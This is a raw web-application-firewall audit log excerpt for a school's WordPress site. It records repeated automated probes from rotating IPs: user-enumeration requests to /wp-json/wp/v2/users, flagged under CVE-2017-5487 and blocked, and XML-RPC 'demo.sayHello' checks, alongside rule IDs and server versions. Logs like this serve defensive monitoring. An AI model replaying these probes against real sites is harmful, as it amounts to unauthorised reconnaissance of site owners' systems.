(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3365db68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3365db68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460587829520 2956 (- - -) Stopwatch2: 1746460587829520 2956; combined=1261, p1=417, p2=813, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3365db68-Z-- --008ed268-A-- [05/May/2025:22:56:30 +0700] aBjfrk2V_h1VFAgsfgZ7nQAAABI 103.236.140.4 41064 103.236.140.4 8181 --008ed268-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --008ed268-C-- demo.sayHello --008ed268-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --008ed268-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460590921178 5327 (- - -) Stopwatch2: 1746460590921178 5327; combined=4268, p1=537, p2=3529, p3=25, p4=28, p5=88, sr=70, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --008ed268-Z-- --992e4054-A-- [05/May/2025:22:56:39 +0700] aBjft02V_h1VFAgsfgZ7oAAAABM 103.236.140.4 41160 103.236.140.4 8181 --992e4054-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --992e4054-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --992e4054-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460599971498 2712 (- - -) Stopwatch2: 1746460599971498 2712; combined=1206, p1=408, p2=768, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --992e4054-Z-- --bec9880f-A-- [05/May/2025:22:56:42 +0700] aBjfuvZJDMuQndL03JNbKAAAAFM 103.236.140.4 41188 103.236.140.4 8181 --bec9880f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bec9880f-C-- demo.sayHello --bec9880f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bec9880f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460602709713 6150 (- - -) Stopwatch2: 1746460602709713 6150; combined=4527, p1=542, p2=3560, p3=31, p4=92, p5=166, sr=74, sw=136, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bec9880f-Z-- --c6fe162e-A-- [05/May/2025:22:56:55 +0700] aBjfx4ZWvR7-42f6JrAL6wAAANg 103.236.140.4 41300 103.236.140.4 8181 --c6fe162e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6fe162e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6fe162e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460615967378 3316 (- - -) Stopwatch2: 1746460615967378 3316; combined=1425, p1=480, p2=913, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6fe162e-Z-- --f875c965-A-- [05/May/2025:22:56:58 +0700] aBjfyoZWvR7-42f6JrAL8AAAAM8 103.236.140.4 41316 103.236.140.4 8181 --f875c965-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f875c965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f875c965-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460618068089 2652 (- - -) Stopwatch2: 1746460618068089 2652; combined=1154, p1=405, p2=721, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f875c965-Z-- --2c70433e-A-- [05/May/2025:22:56:59 +0700] aBjfy02V_h1VFAgsfgZ7qgAAABE 103.236.140.4 41322 103.236.140.4 8181 --2c70433e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2c70433e-C-- demo.sayHello --2c70433e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c70433e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460619017471 5578 (- - -) Stopwatch2: 1746460619017471 5578; combined=4211, p1=524, p2=3462, p3=29, p4=34, p5=95, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c70433e-Z-- --c2164646-A-- [05/May/2025:22:57:01 +0700] aBjfzU2V_h1VFAgsfgZ7rwAAABA 103.236.140.4 41352 103.236.140.4 8181 --c2164646-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.61 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c2164646-C-- demo.sayHello --c2164646-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2164646-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460621867827 6543 (- - -) Stopwatch2: 1746460621867827 6543; combined=4751, p1=645, p2=3868, p3=37, p4=40, p5=96, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2164646-Z-- --ecf34a41-A-- [05/May/2025:22:57:13 +0700] aBjf2fZJDMuQndL03JNbPgAAAE0 103.236.140.4 41436 103.236.140.4 8181 --ecf34a41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ecf34a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecf34a41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460633032497 2495 (- - -) Stopwatch2: 1746460633032497 2495; combined=1208, p1=404, p2=774, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecf34a41-Z-- --115ae84d-A-- [05/May/2025:22:57:16 +0700] aBjf3PZJDMuQndL03JNbQAAAAEY 103.236.140.4 41468 103.236.140.4 8181 --115ae84d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --115ae84d-C-- demo.sayHello --115ae84d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --115ae84d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460636013348 5564 (- - -) Stopwatch2: 1746460636013348 5564; combined=4374, p1=506, p2=3631, p3=38, p4=35, p5=96, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --115ae84d-Z-- --59632909-A-- [05/May/2025:22:57:26 +0700] aBjf5k2V_h1VFAgsfgZ7ywAAABQ 103.236.140.4 41556 103.236.140.4 8181 --59632909-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --59632909-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59632909-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460646008775 2377 (- - -) Stopwatch2: 1746460646008775 2377; combined=1291, p1=399, p2=859, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59632909-Z-- --dc809a19-A-- [05/May/2025:22:57:28 +0700] aBjf6E2V_h1VFAgsfgZ70gAAABI 103.236.140.4 41588 103.236.140.4 8181 --dc809a19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc809a19-C-- demo.sayHello --dc809a19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc809a19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460648765301 5654 (- - -) Stopwatch2: 1746460648765301 5654; combined=4361, p1=517, p2=3542, p3=34, p4=35, p5=131, sr=71, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc809a19-Z-- --8d256d1d-A-- [05/May/2025:22:57:32 +0700] aBjf7ARwKNFSM6B7_LafWwAAAIg 103.236.140.4 41628 103.236.140.4 8181 --8d256d1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d256d1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d256d1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460652343158 2669 (- - -) Stopwatch2: 1746460652343158 2669; combined=1238, p1=426, p2=782, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d256d1d-Z-- --5bead845-A-- [05/May/2025:22:57:36 +0700] aBjf8E2V_h1VFAgsfgZ72wAAAAk 103.236.140.4 41670 103.236.140.4 8181 --5bead845-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5bead845-C-- demo.sayHello --5bead845-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bead845-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460656147732 5616 (- - -) Stopwatch2: 1746460656147732 5616; combined=4220, p1=543, p2=3448, p3=36, p4=36, p5=93, sr=70, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bead845-Z-- --da201b03-A-- [05/May/2025:22:58:42 +0700] aBjgMgRwKNFSM6B7_LafgQAAAIc 103.236.140.4 42252 103.236.140.4 8181 --da201b03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da201b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da201b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460722366076 2688 (- - -) Stopwatch2: 1746460722366076 2688; combined=1390, p1=548, p2=813, p3=0, p4=0, p5=29, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da201b03-Z-- --563cc00a-A-- [05/May/2025:22:58:45 +0700] aBjgNfZJDMuQndL03JNbfgAAAFg 103.236.140.4 42272 103.236.140.4 8181 --563cc00a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --563cc00a-C-- demo.sayHello --563cc00a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --563cc00a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460725334363 6215 (- - -) Stopwatch2: 1746460725334363 6215; combined=4426, p1=551, p2=3634, p3=30, p4=36, p5=102, sr=72, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --563cc00a-Z-- --6d5f8028-A-- [05/May/2025:23:04:10 +0700] aBjhevZJDMuQndL03JNcPAAAAEk 103.236.140.4 44890 103.236.140.4 8181 --6d5f8028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6d5f8028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d5f8028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461050159983 2639 (- - -) Stopwatch2: 1746461050159983 2639; combined=1223, p1=433, p2=762, p3=0, p4=0, p5=28, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5f8028-Z-- --0f5f857a-A-- [05/May/2025:23:04:13 +0700] aBjhfQRwKNFSM6B7_Laf8QAAAJY 103.236.140.4 44910 103.236.140.4 8181 --0f5f857a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.29 